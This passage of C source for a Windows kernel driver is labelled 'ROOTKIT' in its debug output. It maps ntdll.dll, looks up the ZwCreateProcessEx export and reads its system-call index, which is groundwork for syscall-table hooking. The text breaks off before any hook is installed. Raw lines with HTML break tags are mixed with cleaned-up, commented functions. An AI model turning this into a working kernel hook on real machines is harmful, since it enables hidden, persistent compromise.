ULONG StackZeroBits; <br />
ULONG StackReserved; <br />
ULONG StackCommit; <br />
ULONG ImageSubsystem; <br />
WORD SubsystemVersionLow; <br />
WORD SubsystemVersionHigh; <br />
ULONG Unknown1; <br />
ULONG ImageCharacteristics; <br />
ULONG ImageMachineType; <br />
ULONG Unknown2[3];<br />
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;<br />
<br />
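/*
 * GetDllFunctionAddress - map a PE image and look up one of its exports by name.
 *
 * Maps the image named by pDllName as a SEC_IMAGE section into the current
 * process, walks the export name table and returns the virtual address (inside
 * that mapping) of the export whose name equals lpFunctionName.
 *
 * lpFunctionName: NUL-terminated ANSI export name; compared case-insensitively.
 * pDllName:       NT object path of the image file.
 *
 * Returns 0 when the file cannot be opened or mapped, the image has no valid
 * DOS/NT headers or export directory, the export is a forwarder, or the name
 * is not exported.  On every 0 return the view has been unmapped.  On success
 * the view is deliberately left mapped: the returned address points into it
 * and the caller (DriverEntry) reads bytes relative to that address.  Nothing
 * in this file ever unmaps that successful view.
 *
 * NOTE(review): the DWORD return type only holds a full pointer on a 32-bit
 * build; the rest of this file treats it as an address, so a 32-bit target is
 * assumed.
 */
DWORD GetDllFunctionAddress(char* lpFunctionName, PUNICODE_STRING pDllName)
{
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    PVOID BaseAddress = NULL;
    SIZE_T size = 0;
    NTSTATUS status;
    OBJECT_ATTRIBUTES oa = {sizeof oa, 0, pDllName, OBJ_CASE_INSENSITIVE};
    IO_STATUS_BLOCK iosb;
    IMAGE_DOS_HEADER* dosheader;
    IMAGE_NT_HEADERS* nthdr;
    IMAGE_DATA_DIRECTORY* exportDir;
    IMAGE_EXPORT_DIRECTORY* pExportTable;
    DWORD* arrayOfFunctionAddresses;
    DWORD* arrayOfFunctionNames;
    WORD* arrayOfFunctionOrdinals;
    STRING ntFunctionName, ntFunctionNameSearch;
    DWORD x;

    status = ZwOpenFile(&hFile, FILE_EXECUTE | SYNCHRONIZE, &oa, &iosb,
                        FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);
    if (!NT_SUCCESS(status)) {
        return 0;
    }

    /* The section is backed by hFile, so the object name is no longer needed
       and must not be reused as the section's name. */
    oa.ObjectName = NULL;
    status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, &oa, NULL,
                             PAGE_EXECUTE, SEC_IMAGE, hFile);
    /* The section holds its own reference to the file; the handle can go now. */
    ZwClose(hFile);
    if (!NT_SUCCESS(status)) {
        return 0;
    }

    /* CommitSize and Protect are kept from the original call; for SEC_IMAGE
       mappings the per-section protections of the image presumably apply. */
    status = ZwMapViewOfSection(hSection, NtCurrentProcess(), &BaseAddress, 0, 1000,
                                NULL, &size, ViewShare, MEM_TOP_DOWN, PAGE_READWRITE);
    /* Closing the section handle does not unmap the view. */
    ZwClose(hSection);
    if (!NT_SUCCESS(status) || BaseAddress == NULL) {
        return 0;
    }

    /* Validate the headers before trusting any RVA taken from them. */
    dosheader = (IMAGE_DOS_HEADER*)BaseAddress;
    if (dosheader->e_magic != IMAGE_DOS_SIGNATURE) {
        goto not_found;
    }
    nthdr = (IMAGE_NT_HEADERS*)((BYTE*)BaseAddress + dosheader->e_lfanew);
    if (nthdr->Signature != IMAGE_NT_SIGNATURE) {
        goto not_found;
    }
    /* Same location the original reached via e_lfanew + 24 (Signature + FileHeader). */
    exportDir = &nthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (exportDir->VirtualAddress == 0) {
        goto not_found;
    }
    pExportTable = (IMAGE_EXPORT_DIRECTORY*)((BYTE*)BaseAddress + exportDir->VirtualAddress);

    /* The three export tables are stored as RVAs; convert to addresses in this view. */
    arrayOfFunctionAddresses = (DWORD*)((BYTE*)BaseAddress + pExportTable->AddressOfFunctions);
    arrayOfFunctionNames = (DWORD*)((BYTE*)BaseAddress + pExportTable->AddressOfNames);
    arrayOfFunctionOrdinals = (WORD*)((BYTE*)BaseAddress + pExportTable->AddressOfNameOrdinals);

    RtlInitString(&ntFunctionNameSearch, lpFunctionName);

    /* AddressOfNames/AddressOfNameOrdinals have NumberOfNames entries, not
       NumberOfFunctions; looping to NumberOfFunctions over-reads both tables
       whenever an image exports some functions by ordinal only. */
    for (x = 0; x < pExportTable->NumberOfNames; x++) {
        WORD index;
        DWORD rva;

        RtlInitString(&ntFunctionName, (char*)((BYTE*)BaseAddress + arrayOfFunctionNames[x]));
        if (RtlCompareString(&ntFunctionName, &ntFunctionNameSearch, TRUE) != 0) {
            continue;
        }

        /* A name-ordinal entry is already a zero-based index into
           AddressOfFunctions; Base is only needed when looking up by ordinal
           number.  The original's "+ Base - 1" is only correct when Base == 1. */
        index = arrayOfFunctionOrdinals[x];
        if (index >= pExportTable->NumberOfFunctions) {
            goto not_found;
        }
        rva = arrayOfFunctionAddresses[index];

        /* An RVA inside the export directory is a forwarder string, not code. */
        if (rva >= exportDir->VirtualAddress &&
            rva < exportDir->VirtualAddress + exportDir->Size) {
            goto not_found;
        }

        /* Success: the view intentionally stays mapped (see header comment). */
        return (DWORD)((BYTE*)BaseAddress + rva);
    }

not_found:
    ZwUnmapViewOfSection(NtCurrentProcess(), BaseAddress);
    return 0;
}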
<br />
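/*
 * OnStubDispatch - placeholder IRP handler that completes every request.
 *
 * DeviceObject: unused.
 * Irp:          the request; completed here with STATUS_SUCCESS and zero bytes
 *               of information.
 *
 * Returns STATUS_SUCCESS.  The status is returned from a local: once
 * IoCompleteRequest has run the I/O manager may have freed the IRP, so
 * reading Irp->IoStatus.Status afterwards (as the original did) is a
 * use-after-free.
 */
NTSTATUS
OnStubDispatch(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    )
{
    NTSTATUS status = STATUS_SUCCESS;

    (void)DeviceObject;

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    /* Irp must not be touched after this point. */
    return status;
}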
<br />
/*
 * OnUnload - driver unload callback registered by DriverEntry.
 *
 * DriverObject: unused.
 *
 * Only emits a debug trace.  No resources acquired elsewhere in this file are
 * released here; in particular the section view mapped by
 * GetDllFunctionAddress is never unmapped.
 */
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    (void)DriverObject;

    DbgPrint("ROOTKIT: OnUnload called\n");
}
<br />
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )<br />
{<br />
int i;<br />
UNICODE_STRING dllName;<br />
DWORD functionAddress;<br />
int position;<br />
DbgPrint("My Driver Loaded!");<br />
theDriverObject->DriverUnload = OnUnload; <br />
RtlInitUnicodeString(&dllName, L"\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll");<br />
functionAddress = GetDllFunctionAddress("ZwCreateProcessEx", &dllName);<br />
position = *((WORD*)(functionAddress+1));<br />
<br />
DbgPrint("Id:%d\n", position);<br />